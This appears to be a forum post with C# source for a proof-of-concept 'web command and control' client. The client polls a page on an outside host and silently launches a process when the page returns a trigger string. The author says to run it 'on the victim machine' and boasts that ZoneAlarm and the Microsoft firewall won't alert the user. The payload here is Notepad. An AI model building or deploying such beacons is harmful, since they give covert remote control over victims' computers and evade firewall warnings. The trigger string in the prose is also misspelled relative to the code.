using System;
using System.IO;
using System.Net;
using System.Text;
namespace WebGet
{
class Webget
{
public static void Main()
{
// Create a request for the URL.
WebRequest request = WebRequest.Create(
"http://www.firewal.bypass.com/index3.html");
// If required by the server, set the credentials.
request.Credentials = CredentialCache.DefaultCredentials;
// Get the response.
WebResponse response = request.GetResponse();
// Display the status.
Console.WriteLine(((HttpWebResponse)response).StatusDescription);
// Get the stream containing content returned by the server.
Stream dataStream = response.GetResponseStream();
// Open the stream using a StreamReader for easy access.
StreamReader reader = new StreamReader(dataStream);
// Read the content.
string responseFromServer = reader.ReadLine();
// Display the content.
Console.WriteLine(responseFromServer);
Console.ReadLine();
// Clean up the streams and the response.
reader.Close();
response.Close();
if(responseFromServer=="<html_NOTEPAD>")
{
string WorkingDirectory = "C:\\Windows";
try
{
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.CreateNoWindow = true;
p.StartInfo.WorkingDirectory = WorkingDirectory;
p.StartInfo.FileName = WorkingDirectory + "\\" + "notepad.exe";
p.StartInfo.Arguments = null;
// build here the arguments
p.EnableRaisingEvents = true;
// if you want to capture events
p.StartInfo.UseShellExecute = false;
p.Start();
}
catch(Exception exProcess){}
}
}
}
}
And finally for Web Command and Control, have a website setup to feed a <html_NOTPEAD> in its index3.html page... run this on the victim machine and Notepad will spawn, no big deal really, EXCEPT that ZoneAlarm and MCSFT Firewall wont ALERT the user to anything...
